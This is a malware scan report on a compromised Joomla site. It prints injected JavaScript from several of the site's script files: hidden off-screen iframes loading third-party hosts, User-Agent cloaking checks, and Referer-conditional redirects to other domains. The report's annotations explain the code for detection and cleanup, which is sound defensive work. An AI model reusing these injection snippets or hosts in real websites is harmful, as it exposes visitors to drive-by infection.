Scanned pages/files
Request | Server response | Status |
http://betterbusinesssolutionsinc.com/ | 200 OK Content-Length: 23210 Content-Type: text/html | clean |
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 1674 Content-Type: application/x-javascript | malicious |
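Malicious code - confirmed by antiviruses (see below). The scanner shows two fragments of the file; they do not appear to be contiguous (the text jumps from `var o` to `var soset`, and `Grandarium()` is called without its definition being shown).
Fragment 1: function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
Fragment 2: var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium();
Reading of the visible code: fragment 1 defines a cookie reader and a User-Agent substring check against a fixed list; how their results are used is not visible in the excerpt. Fragment 2 writes an iframe positioned off-screen (-888px) that loads a page from a third-party host, and does so only when the User-Agent contains "Windows" and contains neither "Chrome" nor "IEMobile". A check of the site from Chrome or from a non-Windows machine will therefore not show the injected frame.
Antivirus reports: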
| ||
http://betterbusinesssolutionsinc.com/media/system/js/caption.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 1672 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 5447 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner's excerpt for this file stops at `var o`, so only the opening block shared with the other flagged files is visible; whatever follows it in this file is not shown here.
Excerpt: function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 1677 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 2527 Content-Type: application/x-javascript | malicious |
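Malicious code - confirmed by antiviruses (see below). The scanner shows two fragments of the file; they do not appear to be contiguous (the text jumps from `var o` into the middle of the menu code), and the second fragment is cut off inside the iframe tag.
Fragment 1: function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
Fragment 2: if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499"
Reading of the visible code: fragment 2 is the end of the accordion-menu script with a `document.write` of an iframe appended directly after its last statement. The frame is placed off-screen (left:-550px) and loads from a third-party dynamic-DNS host. No User-Agent condition is visible around this `document.write`. The file therefore appears to carry two separate insertions, the opening block in fragment 1 and the appended iframe, and both need to be accounted for when the file is compared against a known-good copy.
Antivirus reports: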
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 1664 Content-Type: application/x-javascript | malicious |
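Malicious code - confirmed by antiviruses (see below). The scanner shows two fragments of the file; they do not appear to be contiguous (the text jumps from `var o` to `function Opelcorsamodel()`).
Fragment 1: function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
Fragment 2: function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel();
Reading of the visible code: fragment 2 has the same structure as the `soset`/`unicode` snippet reported for other files on this site, with different identifiers, a different iframe host and a different off-screen offset (-848px). The iframe is written only when the User-Agent contains "Windows" and contains neither "Chrome" nor "IEMobile". Because the names and host vary between files, a search of the site's files should key on the shared structure (the opening `getCookie` block and a `document.write` of an off-screen iframe), not on one function name or URL.
Antivirus reports: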
| ||
http://betterbusinesssolutionsinc.com/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 1094 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutionsinc.com/wthvideo/wthvideo.js | 200 OK Content-Length: 1664 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/index.php?option=com_contact&view=contact&id=1&Itemid=125 | 200 OK Content-Length: 16275 Content-Type: text/html | clean |
http://betterbusinesssolutionsinc.com/media/system/js/validate.js | 200 OK Content-Length: 5491 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499" Antivirus reports:
| ||
http://betterbusinesssolutionsinc.com/index.php?option=com_content&view=article&id=116&Itemid=124 | 200 OK Content-Length: 17527 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
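URL: http://betterbusinesssolutionsinc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: betterbusinesssolutionsinc.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 12:21:28 GMT Location: http://mdrightnow2014.com/ Server: Apache Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Note: the same URL returned 200 OK to the plain request listed under "Scanned pages/files", while this request, which carries a search-engine Referer, is redirected to another domain. The redirect therefore appears to be conditional on the Referer, so opening the address directly will not reproduce it; where on the server the condition is applied is not visible from this report.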
URL: http://mdrightnow2014.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mdrightnow2014.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 09 Oct 2014 12:21:28 GMT Location: http://doctorhecrew.com Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=betterbusinesssolutionsinc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://betterbusinesssolutionsinc.com/
Result: betterbusinesssolutionsinc.com is not infected or malware details are not published yet.
Result: betterbusinesssolutionsinc.com is not infected or malware details are not published yet.